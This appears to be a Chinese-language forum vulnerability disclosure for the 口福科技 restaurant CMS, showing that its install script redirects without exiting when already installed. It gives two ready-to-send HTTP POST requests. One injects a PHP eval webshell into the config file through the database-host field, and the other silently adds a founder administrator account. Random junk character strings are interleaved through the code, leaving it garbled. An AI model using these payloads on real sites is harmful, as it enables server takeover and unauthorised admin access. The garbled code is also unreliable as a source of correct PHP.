口福科技餐厅cms漏洞(可getshell)

admin

问题出在/install/index.php文件。在程序安装完后，会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。

/ e+ p  E9 G: R, ]9 s9 S4 E<?php
5 d; x4 O% ]& K# O3 e! pif(file_exists("../install.lock"))
{
7 [& Z- j3 T! F9 J6 D    header("Location: ../");//没有退出
, k! C5 {; Y- F1 U+ y) A}
9 M' K, q# B4 W3 n               
7 `/ U* P9 t: H, A8 u$ H5 T: C//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
0 B9 ]8 U8 n; Y# @0 t+ @# r" a{
# \  ~$ p) [- K+ r0 L可见在/install/index.php存在时，只是header做了302重定向并没有退出，也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
9 z, [/ x8 x) r& {6 H3 q) \2 y) j
% @% I7 s  `. n" @- V( L6 l% ~" _1、getshell（很危险）
: f8 X2 y  W4 uif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
$smarty->assign("step",1);
$smarty->display("index.html");
0 b2 T0 l9 O7 E: H" f2 V$ F}elseif($_REQUEST['step']==2)
8 a# o2 H% ^" {9 D; d8 N% v$ w{
+ ^5 C0 i; j& x    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
  a1 z* |. e! |" O! v# j' u6 n    $mysql_db=trim($_POST['mysql_db']);
! v0 K5 j$ y8 S3 P" s, w/ p9 Z    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);
6 o# a' g3 J- s! Z0 Q    $str="<?php \r\n";
" |/ u$ k: n; F( I    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
( Y# L1 f8 K  ^    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
/ ?, T5 N2 j- R    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
  w  U" {  ?/ e, @    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
# g7 F# H% v+ t7 z8 \: h  _    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
7 \4 w: |7 D. ^, F3 H    file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
上面的代码将POST的数据直接写入了../config/config.inc.php文件，那么我们提交如下POST包，即可获得一句话木马
2 l, @6 T+ l3 }' y- p. r$ `, q( e9 xPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
7 d4 i) ]( L: N9 FHost: 192.168.80.129
. v+ Y) f% y- X. G+ H! }. EUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
" a* R  m3 J$ w1 i. g" Z2 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Z1 g$ o8 Q" uAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
9 P0 @- U3 H9 b- A, k6 N- k7 `, w! HAccept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
7 h2 k3 @, g  iCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
         
. i  i' T7 `! g/ y( ^# vmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
! }& Z5 N" {- |9 f& W* j0 E2 z但是这个方法很危险，将导致网站无法运行。
# j, n# T2 r/ A2 a- C4 k. p
2、直接添加管理员

5 b; J" q" K$ {4 Velseif($_REQUEST['step']==5)
{
0 A' y7 N: ~. m& W) `# |" `9 a7 I    if($_POST)
# Z& s  `/ y0 |/ b6 D    {   require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
7 {7 f2 t; I9 {. z5 }        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
$ q* r5 |$ I6 U         mysql_query("SET sql_mode=''");

$adminname=trim($_POST['adminname']);
9 t) k5 o4 |, \7 h' Z        $pwd1=trim($_POST['pwd1']);
  i9 D8 C: |6 @/ b* O% n( P, N        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
# w7 J# p3 Y/ s+ R* G* T' V        {
# H3 K7 |9 `+ m% S/ `+ F. J4 ]
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
, F; F) ]# ~4 z" x9 F7 C        }
4 M6 J0 i. D! c, G& }/ c        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
        }
2 G; j3 c. Q" k5 G        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
    }
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号，语句如下：
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
# C' R/ P4 n, D; l+ E5 l% JHost: 192.168.80.129
! |1 Y* A8 A6 H* `% JUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
3 A8 T) k- \- G( @( gReferer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
; o3 p1 y4 r% O/ k" v( f3 \* t* iContent-Type: application/x-www-form-urlencoded
4 v* N, c1 j2 w. w/ r% IContent-Length: 46
3 m9 F% _7 ]9 H& P      
. W9 K+ \0 ^$ w) Q2 G8 ^+ J% z- zadminname=qingshen&pwd1=qingshen&pwd2=qingshen​
1 [$ c/ S& B% `# ]+ j" `